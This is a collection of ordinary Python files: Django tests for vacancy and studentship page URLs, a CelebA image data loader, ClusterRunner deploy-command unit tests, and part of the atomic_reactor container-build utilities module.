def test_no_auto_page_entity_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/vacancies-and-studentships/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_bogus_entity_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/vacancies-and-studentships/xxxx/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_main_archive_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/archived-vacancies/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_entity_vacancies_archive_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/archived-vacancies/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_bogus_entity_vacancies_archive_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/archived-vacancies/xxxx/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_main_archived_studentships_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/studentships-archive/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_entity_archived_studentships_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/studentships-archive/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_bogus_entity_archived_studentships_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/studentships-archive/xxxx/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_main_all_current_studentships_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/current-studentships/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_entity_all_current_studentships_url(self):
self.school.auto_vacancies_page = False
self.school.save()
response = self.client.get('/current-studentships/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_bogus_entity_all_current_studentships_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/current-studentships/xxx/')
self.assertEqual(response.status_code, 404)
# entity vacancies and studentships URLs - no entity home page
def test_no_entity_home_page_main_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/vacancies-and-studentships/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_entity_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/vacancies-and-studentships/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_bogus_entity_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/vacancies-and-studentships/xxxx/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_main_archive_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/archived-vacancies/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_entity_vacancies_archive_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/archived-vacancies/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_bogus_entity_vacancies_archive_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/archived-vacancies/xxxx/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_main_archived_studentships_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/studentships-archive/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_entity_archived_studentships_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/studentships-archive/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_bogus_entity_archived_studentships_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/studentships-archive/xxxx/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_main_all_current_studentships_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/current-studentships/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_entity_all_current_studentships_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/current-studentships/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_bogus_entity_all_current_studentships_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/current-studentships/xxx/')
self.assertEqual(response.status_code, 404)
class ListTests(TestCase):
def setUp(self):
self.item1 = Vacancy(
title="closes today, less important",
in_lists=True,
published=True,
date=datetime.now()
)
self.item1.save()
self.item2 = Vacancy(
title="closed 20 days ago, important",
summary="a job for today",
in_lists=True,
published=True,
date=datetime.now()-timedelta(days=20),
importance=3,
slug="item2"
)
self.item2.save()
self.item3 = Vacancy(
title="closes in the future",
in_lists=True,
published=True,
date=datetime.now()+timedelta(days=20),
importance=3,
slug="item3"
)
self.item3.save()
self.itemlist = List()
self.itemlist.model = Vacancy
self.itemlist.items = Vacancy.objects.all()
def test_all_items_order(self):
self.assertEqual(
list(self.itemlist.items),
[self.item2, self.item1, self.item3]
)
def test_reorder_by_importance_date_only(self):
# check the re-ordered items are not changed
self.itemlist.re_order_by_importance()
self.assertEqual(
list(self.itemlist.items),
[self.item2, self.item1, self.item3]
)
def test_reorder_by_importance_date_makes_no_difference(self):
# check that items are re-ordered by importance
self.itemlist.order_by = "importance/date"
self.itemlist.re_order_by_importance()
self.assertEqual(
list(self.itemlist.items),
[self.item2, self.item1, self.item3]
)
def test_truncate_items(self):
# check that items are re-ordered by importance
self.itemlist.limit_to = 1
self.itemlist.truncate_items()
self.assertEqual(
list(self.itemlist.items),
[self.item2]
)
def test_set_items_for_person(self):
p = Person()
p.save()
self.item1.please_contact.add(p)
self.itemlist.person = p
self.itemlist.set_items_for_person()
self.assertEqual(
list(self.itemlist.items),
[self.item1]
)
def test_build(self):
self.itemlist.build()
self.assertEqual(list(self.itemlist.items), [self.item1, self.item3])
def test_other_items(self):
school = Entity(name="School of Medicine", short_name="Medicine")
school.save()
self.itemlist.entity = school
self.itemlist.other_item_kinds = ["archived", "open", "main"]
self.itemlist.build()
# "main" other items are always created; the others need tests to
# see if any exist
self.assertEqual(
self.itemlist.other_items(),
[{
'link': '/vacancies-and-studentships/',
'title': u'Medicine vacancies & studentships',
'css_class': 'main',
}]
)
# now we save some items
self.item1.hosted_by = school
self.item2.hosted_by = school
self.item3.hosted_by = school
self.item1.save()
self.item2.save()
self.item3.save()
self.itemlist.build()
self.assertEqual(list(self.itemlist.items), [self.item1, self.item3])
self.assertEqual(list(self.itemlist.archived), [self.item2])
self.assertEqual(
list(self.itemlist.other_items()),
[{
'count': 2,
'link': '/vacancies/',
'title': 'All open vacancies'
},
{
'count': 1,
'link': '/archived-vacancies/',
'title': 'Archived vacancies'
},
{
'link': '/vacancies-and-studentships/',
'title': u'Medicine vacancies & studentships',
'css_class': 'main',
},
]
)
class FilterListTests(TestCase):
def setUp(self):
self.item1 = Vacancy(
title="closes today, less important",
in_lists=True,
published=True,
date=datetime.now()
)
self.item1.save()
self.item2 = Vacancy(
title="closed 20 days ago, important",
summary="a job for today",
in_lists=True,
published=True,
date=datetime.now()-timedelta(days=20),
importance=3,
slug="item2"
)
self.item2.save()
self.item3 = Vacancy(
title="closes in the future",
in_lists=True,
published=True,
date=datetime.now()+timedelta(days=20),
importance=3,
slug="item3"
)
self.item3.save()
self.itemlist = FilterList()
self.itemlist.model = Vacancy
self.itemlist.request = HttpRequest()
def test_filter_on_search_terms_no_terms(self):
query = QueryDict("")
self.itemlist.request.GET = query
self.itemlist.build()
self.assertEqual(
list(self.itemlist.items),
[self.item1, self.item3]
)
def test_filter_on_search_terms_1_match(self):
query = QueryDict("text=today")
self.itemlist.request.GET = query
self.itemlist.build()
self.assertEqual(
list(self.itemlist.items),
[self.item1]
)
class PluginListerTests(TestCase):
def test_other_items(self):
lister = VacanciesAndStudentshipsPluginLister(
entity=Entity(slug="test")
)
self.assertItemsEqual(
lister.other_items(),
[{
'css_class': 'main',
'link': '/vacancies-and-studentships/test/',
'title': 'More '
}]
)
|
|
import os
import cv2
import numpy as np
import threading
import random
from multiprocessing.dummy import Pool
from multiprocessing import cpu_count
class Net:
def __init__(self, subset_name='train', options = None):
""" Module for loading CelebA data
:param subset_name: "train", "validation", "test"
:param cache_dir: (default) "var/data/OMNIGLOT"
"""
if subset_name == 'train':
self._mode = '0'
elif subset_name == 'validation':
self._mode = '1'
elif subset_name == 'test':
self._mode = '2'
else:
self._mode = '0'
self._subset_name = subset_name
self._debug = False
self._shuffle = False
self._cache_size = 3000
self._mean_reduce = False
self._mean = [5.0, 10.0, 15.0]
if options != None and options != {}:
if 'cache_size' in options:
self._cache_size = options['cache_size']
if 'mean_reduce' in options:
self._mean_reduce = options['mean_reduce']
if 'shuffle' in options:
self._shuffle = options['shuffle']
if 'debug' in options:
self._debug = options['debug']
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = current_path[:-9]
self._imname = root_path+'data/celeba_images/Eval/list_eval_partition.txt'
self._maflname_train = root_path+'data/celeba_data/training.txt'
self._maflname_test = root_path+'data/celeba_data/testing.txt'
self._impath = root_path+'data/celeba_images/Img/img_align_celeba_png/'
with open(self._imname, 'r') as f:
self._lines = f.read().splitlines()
self._imlist = [line.split(' ')[0] for line in self._lines if line.split(' ')[1] == self._mode]
self._celeba_test = [line.split(' ')[0] for line in self._lines if line.split(' ')[1] == '2']
with open(self._maflname_train, 'r') as f:
self._lines = f.read().splitlines()
self._mafllist_train = [line.split(' ')[0] for line in self._lines]
with open(self._maflname_test, 'r') as f:
self._lines = f.read().splitlines()
self._mafllist_test = [line.split(' ')[0] for line in self._lines]
if subset_name == 'train':
self._imlist = sorted(list(set(self._imlist)-set(self._mafllist_test)))
if subset_name == 'mafl_train':
self._imlist = self._mafllist_train
if subset_name == 'test':
self._imlist = self._mafllist_test
if subset_name == 'celeba_test':
self._imlist = self._celeba_test
if subset_name == 'demo':
import glob
self._imlist = sorted(glob.glob(root_path+'demo/input/*.jpg'))
if "chosen_indexes" in options and options["chosen_indexes"] is not None:
chosen_index = options["chosen_indexes"]
self._imlist = list(self._imlist[i] for i in chosen_index)
self._num_samples = len(self._imlist)
self._waitlist = list(range(len(self._imlist)))
if self._shuffle:
random.shuffle(self._waitlist)
self._dataset = None
self._cur_pos = 0 # num of sample done in this epoch
self._cur_epoch = 0 # current num of epoch
self._cur_iter = 0 # num of batches returned
self._num_fields = 1 # number of fields need to return (image, label)
self._out_h = 80
self._out_w = 80
self._image_cache = []
self._lock = threading.Lock()
self._pool_size = cpu_count()
self._pool = Pool(self._pool_size)
self._cache_thread = threading.Thread(target=self.preload_dataset)
self._cache_thread.start()
def read_image(self, i):
if self._subset_name == 'demo':
image_name = self._imlist[i]
image_arr = cv2.imread(image_name)
image_arr = cv2.resize(image_arr, (80, 80))
result = image_arr.astype(np.float32) / np.array(255., dtype=np.float32)
else:
image_name = self._impath + self._imlist[i].split('.')[0] + '.png'
# The channel for cv2.imread is B, G, R
image_arr = cv2.imread(image_name)
image_arr = cv2.resize(image_arr, (100, 100))
height, width, channels = image_arr.shape
margin_h = int(np.round((height - self._out_h) / 2))
margin_w = int(np.round((width - self._out_w) / 2))
cropped_im = image_arr[margin_h:self._out_h + margin_h, margin_w:self._out_w + margin_w, :]
result = cropped_im.astype(np.float32) / np.array(255., dtype=np.float32)
result[:, :, [0, 1, 2]] = result[:, :, [2, 1, 0]]
return result
def __call__(self, *args, **kwargs):
return self.next_batch(*args, **kwargs)
def num_samples(self):
return self._num_samples
def epoch(self):
return self._cur_epoch
def iter(self):
return self._cur_iter
def num_fields(self):
return self._num_fields
def num_samples_finished(self):
return self._cur_pos
def reset(self):
""" Reset the state of the data loader
E.g., the reader points at the beginning of the dataset again
:return: None
"""
self._cur_pos = 0
self._cur_epoch = 0
self._cur_iter = 0
self._waitlist = list(range(len(self._imlist)))
if self._shuffle:
random.shuffle(self._waitlist)
tmp = 0
while self._cache_thread.isAlive():
tmp+=1
self._cache_thread = threading.Thread(target=self.preload_dataset)
self._lock.acquire()
self._image_cache = []
self._lock.release()
self._cache_thread.start()
def preload_dataset(self):
if self._debug:
print("preload")
if len(self._image_cache) > self._cache_size:
return
else:
while len(self._image_cache) < 1000:
if len(self._waitlist) < 1000:
self._waitlist += list(range(len(self._imlist)))
if self._shuffle:
random.shuffle(self._waitlist)
results = self._pool.map(self.read_image, self._waitlist[:1000])
del self._waitlist[:1000]
self._lock.acquire()
self._image_cache = self._image_cache + results
self._lock.release()
if self._debug:
print(len(self._image_cache))
def next_batch(self, batch_size):
""" fetch the next batch
:param batch_size: next batch_size
:return: a tuple includes all data
"""
if batch_size < 0:
batch_size = 0
if self._cache_size < 3 * batch_size:
self._cache_size = 3 * batch_size
this_batch = [None] * self._num_fields
if len(self._image_cache) < batch_size:
if self._debug:
print("Blocking!!, Should only appear once with proper setting")
if not self._cache_thread.isAlive():
self._cache_thread = threading.Thread(target=self.preload_dataset)
self._cache_thread.start()
self._cache_thread.join()
self._lock.acquire()
this_batch[0] = self._image_cache[0:batch_size]
del self._image_cache[0:batch_size]
self._lock.release()
else:
self._lock.acquire()
this_batch[0] = self._image_cache[0:batch_size]
del self._image_cache[0:batch_size]
self._lock.release()
if not self._cache_thread.isAlive():
self._cache_thread = threading.Thread(target=self.preload_dataset)
self._cache_thread.start()
self._cur_iter += 1
self._cur_pos = self._cur_pos + batch_size
if self._cur_pos >= self._num_samples:
self._cur_epoch += 1
self._cur_pos = self._cur_pos % self._num_samples
return this_batch
@staticmethod
def output_types(): # only used for net instance
t = ["float32"]
return t
@staticmethod
def output_shapes():
t = [(None, 80, 80, 3)] # None for batch size
return t
@staticmethod
def output_ranges():
return [1.]
@staticmethod
def output_keys():
return ["data"]
if __name__ == '__main__':
main()
|
|
from functools import partial
from os.path import join, expanduser
from unittest.mock import MagicMock
import uuid
from genty import genty, genty_dataset, genty_args
from app.subcommands.deploy_subcommand import DeploySubcommand
from app.util.network import Network
from test.framework.base_unit_test_case import BaseUnitTestCase
@genty
class TestDeploySubcommand(BaseUnitTestCase):
def setUp(self):
super().setUp()
self.patch('app.subcommands.deploy_subcommand.fs.tar_directory')
def test_binaries_tar_raises_exception_if_running_from_source(self):
deploy_subcommand = DeploySubcommand()
with self.assertRaisesRegex(SystemExit, '1'):
deploy_subcommand._binaries_tar('python main.py deploy', '~/.clusterrunner/dist')
def test_binaries_doesnt_raise_exception_if_running_from_bin(self):
self.patch('os.path.isfile').return_value = True
deploy_subcommand = DeploySubcommand()
deploy_subcommand._binaries_tar('clusterrunner', '~/.clusterrunner/dist')
def test_deploy_binaries_and_conf_deploys_both_conf_and_binary_for_remote_host(self):
mock_DeployTarget = self.patch('app.subcommands.deploy_subcommand.DeployTarget')
mock_DeployTarget_instance = mock_DeployTarget.return_value
deploy_subcommand = DeploySubcommand()
deploy_subcommand._deploy_binaries_and_conf(
'remote_host', 'username', 'exec', '/path/to/exec', '/path/to/conf')
self.assertTrue(mock_DeployTarget_instance.deploy_binary.called)
self.assertTrue(mock_DeployTarget_instance.deploy_conf.called)
@genty_dataset(
# expect to deploy the binary but not the conf when the current executable path is not the same
# as the target executable path but the current conf path is the same as the target conf path
same_conf_path_different_exe_path=genty_args(
current_executable=join(expanduser('~'), '.clusterrunner', 'dist', 'clusterrunner2'),
in_use_conf_path=join(expanduser('~'), '.clusterrunner', 'clusterrunner.conf'),
expect_deploy_conf=False,
expect_deploy_binary=True,
),
# expect not to deploy the binary or the conf when the current executable path is the same
# as the target executable path and the current conf path is the same as the target conf path
same_conf_path_same_exe_path=genty_args(
current_executable=join(expanduser('~'), '.clusterrunner', 'dist', 'clusterrunner'),
in_use_conf_path=join(expanduser('~'), '.clusterrunner', 'clusterrunner.conf'),
expect_deploy_conf=False,
expect_deploy_binary=False,
),
# expect to deploy the conf but not the binary when the current conf path is not the same
# as the target conf path but the current binary path is the same as the target binary path
different_conf_path_same_exe_path=genty_args(
current_executable=join(expanduser('~'), '.clusterrunner', 'dist', 'clusterrunner'),
in_use_conf_path=join(expanduser('~'), '.clusterrunner', 'clusterrunner2.conf'),
expect_deploy_conf=True,
expect_deploy_binary=False,
),
# expect to deploy the binary and the conf when the current executable path is not the same
# as the target executable path and the current conf path is not the same as the target conf path
different_conf_path_different_exe_path=genty_args(
current_executable=join(expanduser('~'), '.clusterrunner', 'dist', 'clusterrunner2'),
in_use_conf_path=join(expanduser('~'), '.clusterrunner', 'clusterrunner2.conf'),
expect_deploy_conf=True,
expect_deploy_binary=True,
),
)
def test_deploy_binaries_and_conf_behaves_properly_if_conf_or_binary_is_in_use_on_localhost(
self,
current_executable,
in_use_conf_path,
expect_deploy_conf,
expect_deploy_binary,
):
mock_DeployTarget = self.patch('app.subcommands.deploy_subcommand.DeployTarget')
mock_DeployTarget_instance = mock_DeployTarget.return_value
deploy_subcommand = DeploySubcommand()
deploy_subcommand._deploy_binaries_and_conf(
'localhost',
'username',
current_executable,
join(expanduser('~'), '.clusterrunner', 'clusterrunner.tgz'),
in_use_conf_path
)
self.assertEqual(expect_deploy_binary, mock_DeployTarget_instance.deploy_binary.called)
self.assertEqual(expect_deploy_conf, mock_DeployTarget_instance.deploy_conf.called)
def test_non_registered_slaves_returns_empty_list_if_all_registered(self):
registered_hosts = ['host_1', 'host_2']
slaves_to_validate = ['host_1', 'host_2']
def get_host_id(*args, **kwargs):
if args[0] == 'host_1':
return 'host_id_1'
elif args[0] == 'host_2':
return 'host_id_2'
else:
return 'blah'
old_host_id = Network.get_host_id
Network.get_host_id = get_host_id
deploy_subcommand = DeploySubcommand()
non_registered = deploy_subcommand._non_registered_slaves(registered_hosts, slaves_to_validate)
Network.get_host_id = old_host_id
self.assertEquals(0, len(non_registered))
def test_non_registered_slaves_returns_non_registered_slaves(self):
registered_hosts = ['host_1', 'host_3']
slaves_to_validate = ['host_1', 'host_2', 'host_3', 'host_4']
def get_host_id(*args, **kwargs):
if args[0] == 'host_1':
return 'host_id_1'
elif args[0] == 'host_2':
return 'host_id_2'
elif args[0] == 'host_3':
return 'host_id_3'
elif args[0] == 'host_4':
return 'host_id_4'
else:
return 'blah'
self.patch('app.util.network.Network.get_host_id', new=get_host_id)
deploy_subcommand = DeploySubcommand()
non_registered = deploy_subcommand._non_registered_slaves(registered_hosts, slaves_to_validate)
self.assertEquals(len(non_registered), 2)
self.assertTrue('host_2' in non_registered)
self.assertTrue('host_4' in non_registered)
def test_non_registered_slaves_returns_empty_list_with_slaves_with_same_host_ids_but_different_names(self):
registered_hosts = ['host_1_alias', 'host_2_alias']
slaves_to_validate = ['host_1', 'host_2']
def get_host_id(*args, **kwargs):
if args[0] == 'host_1':
return 'host_id_1'
elif args[0] == 'host_2':
return 'host_id_2'
elif args[0] == 'host_1_alias':
return 'host_id_1'
elif args[0] == 'host_2_alias':
return 'host_id_2'
else:
return 'blah'
self.patch('app.util.network.Network.get_host_id', new=get_host_id)
deploy_subcommand = DeploySubcommand()
non_registered = deploy_subcommand._non_registered_slaves(registered_hosts, slaves_to_validate)
self.assertEquals(0, len(non_registered))
@genty_dataset(
valid_deployment=genty_args(
slaves_to_validate=['slave_host_1', 'slave_host_2'],
connected_slaves=['slave_host_1', 'slave_host_2'],
host_name_to_uid={
'slave_host_1': 'host_1_id',
'slave_host_2': 'host_2_id',
},
is_valid=True,
),
host_mismatch=genty_args(
slaves_to_validate=['slave_host_1', 'slave_host_2'],
connected_slaves=['slave_host_3', 'slave_host_2'],
host_name_to_uid={
'slave_host_2': 'host_2_id',
},
is_valid=False,
),
number_of_slaves_not_match=genty_args(
slaves_to_validate=['slave_host_1'],
connected_slaves=['slave_host_1', 'slave_host_2'],
host_name_to_uid={
'slave_host_1': 'host_1_id',
},
is_valid=False,
),
valid_deployment_different_host_names_with_same_host_id=genty_args(
slaves_to_validate=['slave_host_1', 'slave_host_2'],
connected_slaves=['slave_host_1_alias', 'slave_host_2'],
host_name_to_uid={
'slave_host_1': 'host_1_id',
'slave_host_1_alias': 'host_1_id',
'slave_host_2': 'host_2_id',
},
is_valid=True,
),
)
def test_validate_deployment_checks_each_slave_is_connected(
self,
slaves_to_validate,
connected_slaves,
host_name_to_uid,
is_valid,
):
def get_host_id(host):
if host in host_name_to_uid:
return host_name_to_uid[host]
else:
return str(uuid.uuid4())
self.patch('app.util.network.Network.get_host_id', new=get_host_id)
deploy_subcommand = DeploySubcommand()
deploy_subcommand._registered_slave_hostnames = MagicMock(return_value=connected_slaves)
deploy_subcommand._SLAVE_REGISTRY_TIMEOUT_SEC = 1
deploy_subcommand._non_registered_slaves = MagicMock()
validate = partial(deploy_subcommand._validate_successful_deployment, 'master_host_url', slaves_to_validate)
if not is_valid:
with self.assertRaises(SystemExit):
validate()
else:
validate()
|
|
"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
from __future__ import print_function, unicode_literals
import hashlib
import json
import jsonschema
import os
import re
from pipes import quote
import requests
from requests.exceptions import ConnectionError, SSLError, HTTPError, RetryError, Timeout
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util import Retry
import shutil
import subprocess
import tempfile
import logging
import uuid
import yaml
import codecs
import string
import time
from six.moves.urllib.parse import urlparse
from atomic_reactor.constants import (DOCKERFILE_FILENAME, FLATPAK_FILENAME, TOOLS_USED,
INSPECT_CONFIG,
IMAGE_TYPE_DOCKER_ARCHIVE, IMAGE_TYPE_OCI, IMAGE_TYPE_OCI_TAR,
HTTP_MAX_RETRIES, HTTP_BACKOFF_FACTOR,
HTTP_CLIENT_STATUS_RETRY, HTTP_REQUEST_TIMEOUT,
MEDIA_TYPE_DOCKER_V2_SCHEMA1, MEDIA_TYPE_DOCKER_V2_SCHEMA2,
MEDIA_TYPE_DOCKER_V2_MANIFEST_LIST, MEDIA_TYPE_OCI_V1,
MEDIA_TYPE_OCI_V1_INDEX, GIT_MAX_RETRIES, GIT_BACKOFF_FACTOR)
from dockerfile_parse import DockerfileParser
from pkg_resources import resource_stream
from importlib import import_module
from requests.utils import guess_json_utf
logger = logging.getLogger(__name__)
class ImageName(object):
def __init__(self, registry=None, namespace=None, repo=None, tag=None):
self.registry = registry
self.namespace = namespace
self.repo = repo
self.tag = tag
@classmethod
def parse(cls, image_name):
result = cls()
# registry.org/namespace/repo:tag
s = image_name.split('/', 2)
if len(s) == 2:
if '.' in s[0] or ':' in s[0]:
result.registry = s[0]
else:
result.namespace = s[0]
elif len(s) == 3:
result.registry = s[0]
result.namespace = s[1]
result.repo = s[-1]
for sep in '@:':
try:
result.repo, result.tag = result.repo.rsplit(sep, 1)
except ValueError:
continue
break
return result
def to_str(self, registry=True, tag=True, explicit_tag=False,
explicit_namespace=False):
if self.repo is None:
raise RuntimeError('No image repository specified')
result = self.get_repo(explicit_namespace)
if tag and self.tag and ':' in self.tag:
result = '{0}@{1}'.format(result, self.tag)
elif tag and self.tag:
result = '{0}:{1}'.format(result, self.tag)
elif tag and explicit_tag:
result = '{0}:{1}'.format(result, 'latest')
if registry and self.registry:
result = '{0}/{1}'.format(self.registry, result)
return result
def get_repo(self, explicit_namespace=False):
result = self.repo
if self.namespace:
result = '{0}/{1}'.format(self.namespace, result)
elif explicit_namespace:
result = '{0}/{1}'.format('library', result)
return result
@property
def pulp_repo(self):
return self.to_str(registry=False, tag=False).replace("/", "-")
def __str__(self):
return self.to_str(registry=True, tag=True)
def __repr__(self):
return "ImageName(image=%r)" % self.to_str()
def __eq__(self, other):
return type(self) == type(other) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(self.to_str())
def copy(self):
return ImageName(
registry=self.registry,
namespace=self.namespace,
repo=self.repo,
tag=self.tag)
def figure_out_build_file(absolute_path, local_path=None):
"""
try to figure out the build file (Dockerfile or flatpak.json) from provided
path and optionally from relative local path this is meant to be used with
git repo: absolute_path is path to git repo, local_path is path to dockerfile
within git repo
:param absolute_path:
:param local_path:
:return: tuple, (dockerfile_path, dir_with_dockerfile_path)
"""
logger.info("searching for dockerfile in '%s' (local path %s)", absolute_path, local_path)
logger.debug("abs path = '%s', local path = '%s'", absolute_path, local_path)
if local_path:
if local_path.endswith(DOCKERFILE_FILENAME) or local_path.endswith(FLATPAK_FILENAME):
git_build_file_dir = os.path.dirname(local_path)
build_file_dir = os.path.abspath(os.path.join(absolute_path, git_build_file_dir))
else:
build_file_dir = os.path.abspath(os.path.join(absolute_path, local_path))
else:
build_file_dir = os.path.abspath(absolute_path)
if not os.path.isdir(build_file_dir):
raise IOError("Directory '%s' doesn't exist." % build_file_dir)
# Check for flatpak.json first because we do flatpak.json => Dockerfile generation
build_file_path = os.path.join(build_file_dir, FLATPAK_FILENAME)
if os.path.isfile(build_file_path):
logger.debug("flatpak.json found: '%s'", build_file_path)
return build_file_path, build_file_dir
build_file_path = os.path.join(build_file_dir, DOCKERFILE_FILENAME)
if os.path.isfile(build_file_path):
logger.debug("Dockerfile found: '%s'", build_file_path)
return build_file_path, build_file_dir
raise IOError("Dockerfile '%s' doesn't exist." % build_file_path)
class CommandResult(object):
def __init__(self):
self._logs = []
self._parsed_logs = []
self._error = None
self._error_detail = None
def parse_item(self, item):
"""
:param item: dict, decoded log data
"""
# append here just in case .get bellow fails
self._parsed_logs.append(item)
# make sure the log item is a dictionary object
if isinstance(item, dict):
line = item.get("stream", "")
else:
line = item
item = None
for l in line.splitlines():
l = l.strip()
self._logs.append(l)
if l:
logger.debug(l)
if item is not None:
self._error = item.get("error", None)
self._error_detail = item.get("errorDetail", None)
if self._error:
logger.error(item)
@property
def parsed_logs(self):
return self._parsed_logs
@property
def logs(self):
return self._logs
@property
def error(self):
return self._error
@property
def error_detail(self):
return self._error_detail
def is_failed(self):
return bool(self.error) or bool(self.error_detail)
def wait_for_command(logs_generator):
"""
Create a CommandResult from given iterator
:return: CommandResult
"""
logger.info("wait_for_command")
cr = CommandResult()
for item in logs_generator:
cr.parse_item(item)
logger.info("no more logs")
return cr
def clone_git_repo(git_url, target_dir, commit=None, retry_times=GIT_MAX_RETRIES):
"""
clone provided git repo to target_dir, optionally checkout provided commit
:param git_url: str, git repo to clone
:param target_dir: str, filesystem path where the repo should be cloned
:param commit: str, commit to checkout, SHA-1 or ref
:param retry_times: int, number of retries for git clone
:return: str, commit ID of HEAD
"""
retry_delay = GIT_BACKOFF_FACTOR
commit = commit or "master"
logger.info("cloning git repo '%s'", git_url)
logger.debug("url = '%s', dir = '%s', commit = '%s'",
git_url, target_dir, commit)
cmd = ["git", "clone", git_url, quote(target_dir)]
logger.debug("cloning '%s'", cmd)
for counter in range(retry_times + 1):
try:
# we are using check_output, even though we aren't using
# the return value, but we will get 'output' in exception
subprocess.check_output(cmd, stderr=subprocess.STDOUT)
break
except subprocess.CalledProcessError as exc:
if counter != retry_times:
logger.info("retrying command '%s':\n '%s'", cmd, exc.output)
time.sleep(retry_delay * (2 ** counter))
else:
raise
cmd = ["git", "reset", "--hard", commit]
logger.debug("checking out branch '%s'", cmd)
subprocess.check_call(cmd, cwd=target_dir)
cmd = ["git", "rev-parse", "HEAD"]
logger.debug("getting SHA-1 of provided ref '%s'", cmd)
commit_id = subprocess.check_output(cmd, cwd=target_dir)
commit_id = commit_id.strip()
logger.info("commit ID = %s", commit_id)
return commit_id
class LazyGit(object):
"""
usage:
lazy_git = LazyGit(git_url="...")
with lazy_git:
laze_git.git_path
or
lazy_git = LazyGit(git_url="...", tmpdir=tmp_dir)
lazy_git.git_path
"""
def __init__(self, git_url, commit=None, tmpdir=None):
self.git_url = git_url
# provided commit ID/reference to check out
self.commit = commit
# commit ID of HEAD; we'll figure this out ourselves
self._commit_id = None
self.provided_tmpdir = tmpdir
self._git_path = None
@property
def _tmpdir(self):
return self.provided_tmpdir or self.our_tmpdir
@property
def commit_id(self):
return self._commit_id
@property
def git_path(self):
if self._git_path is None:
self._commit_id = clone_git_repo(self.git_url, self._tmpdir, self.commit)
self._git_path = self._tmpdir
return self._git_path
def __enter__(self):
if not self.provided_tmpdir:
self.our_tmpdir = tempfile.mkdtemp()
def __exit__(self, exc_type, exc_val, exc_tb):
if not self.provided_tmpdir:
if self.our_tmpdir:
shutil.rmtree(self.our_tmpdir)
def escape_dollar(v):
try:
str_type = unicode
except NameError:
str_type = str
if isinstance(v, str_type):
return v.replace('$', r'\$')
else:
return v
def render_yum_repo(repo, escape_dollars=True):
repo.setdefault("name", str(uuid.uuid4().hex[:6]))
repo_name = repo["name"]
logger.info("rendering repo '%s'", repo_name)
rendered_repo = '[%s]\n' % repo_name
for key, value in repo.items():
if escape_dollars:
value = escape_dollar(value)
rendered_repo += "%s=%s\n" % (key, value)
logger.info("rendered repo: %r", rendered_repo)
return rendered_repo
def process_substitutions(mapping, substitutions):
"""Process `substitutions` for given `mapping` (modified in place)
:param mapping: a dict
:param substitutions: either a dict {key: value} or a list of ["key=value"] strings
keys can use dotted notation to change to nested dicts
Note: Plugin substitutions are processed differently - they are accepted in form of
plugin_type.plugin_name.arg_name, even though that doesn't reflect the actual
structure of given mapping.
Also note: For non-plugin substitutions, additional dicts/key/value pairs
are created on the way if they're missing. For plugin substitutions, only
existing values can be changed (TODO: do we want to change this behaviour?).
"""
def parse_val(v):
# TODO: do we need to recognize numbers,lists,dicts?
if v.lower() == 'true':
return True
elif v.lower() == 'false':
return False
elif v.lower() == 'none':
return None
return v
if isinstance(substitutions, list):
# if we got a list, get a {key: val} dict out of it
substitutions = dict([s.split('=', 1) for s in substitutions])
for key, val in substitutions.items():
cur_dict = mapping
key_parts = key.split('.')
if key_parts[0].endswith('_plugins'):
_process_plugin_substitution(mapping, key_parts, val)
else:
key_parts_without_last = key_parts[:-1]
# now go down mapping, following the dotted path; create empty dicts on way
for k in key_parts_without_last:
if k in cur_dict:
if not isinstance(cur_dict[k], dict):
cur_dict[k] = {}
else:
cur_dict[k] = {}
cur_dict = cur_dict[k]
cur_dict[key_parts[-1]] = parse_val(val)
def _process_plugin_substitution(mapping, key_parts, value):
try:
plugin_type, plugin_name, arg_name = key_parts
except ValueError:
logger.error("invalid absolute path '%s': it requires exactly three parts: "
"plugin type, plugin name, argument name (dot separated)",
key_parts)
